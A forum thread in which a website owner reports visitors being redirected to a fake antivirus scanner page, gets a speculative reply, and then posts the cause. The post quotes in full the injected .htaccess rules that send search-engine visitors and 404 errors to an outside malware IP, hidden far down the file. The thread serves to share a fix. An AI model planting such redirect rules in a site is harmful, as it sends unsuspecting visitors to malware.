Hi All, Hoping to get some help. I've contacted my host but they are slow. The other day a subscriber unsubscribed and told me that my site had spyware! I promptly contacted him to ask what he was doing at the time, and also proceeded to do a back up. After doing the backup, I noticed I could download the backed up file from my server through FTP, but not direct, i.e. if I tried to download it via a URL I got the following happening: The URL would redirect to: http://www.penbuddies.com/inc/temp/i.html An antivirus window would pop up (we've all seen these before ), and then the http://www.penbuddies.com/inc/temp/i.html link would redirect to: http://scanner.win-antivir-2008.com/35/?adv=1096&ref=1105&p=1000000000 I noriced though that if I tried to download any other file it wasn't happening. I then noticed my back up file was in the root, and not in the Public_html folder, so I added a picture file to my root, tried to access that via URL and voila, the same thing as above, the antivirus nonsens, so I nailed it down to something that must be in the root. I found a file called .canna which was some weird looking text and said it came from NEC Corporation, Tokyo, Copyright from 1992 and all sorts of BS in it. So naturally I deleted it. But the issues still was there, it didn't fix it. I checked all the other files and they are all fine. And then I got a response from the unsubscribee. He sent me two links (which were the Aweber click trackking links) which pointed to two files, but when I clicked on them they were fine. I then told him, and funnily enough he said that they were working fine now. Hmmmm, things were getting more confusing. Still waiting for my host to respond, as it is the weekend, I have just left it. Then today, I installed a new version of wordpress in a sub folder, and not 2 hours into editing the theme, I get the exact same antivirus nonsense when trying to update an edit. For example, I would try and update sometihng in sidebar.php, or search.php, and after doing the edit and clicking, update, I would get forwarded to the antivirus penbuddies pages and the pop up. I have now upgraded all scripts, maybe I was hacked through one of these. any ideas how to find what it is so I can remove it? cheers dean
Yes, it seems he has access to the server on which your account is hosted on, internally. He's able to modify directories and piggy back request attacks which is why you are being redirected to a page infected with malware. I suggest you PM me if you are looking into securing your website. In the mean time, your host should be notified that they have indeed been breached. The redirected page is fairly buggy to your system, but the reason the attacker did this was to gain more time on his behalf to further escalate his administrative privileges.
Well in case anyone finds they have the same issue, I have resolved it and am letting you all know how I found it. It was obvious someone got access to my server, so I have changed my password. Once in they added the following code to my .htaccess file RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L] Errordocument 404 http://87.248.180.88/in.html?s=hg_err They also placed it so far down you had to scroll down for ages to get to it. This is why I missed it the first time. So there you have it. Thank god as it has saved me a lot of money!!!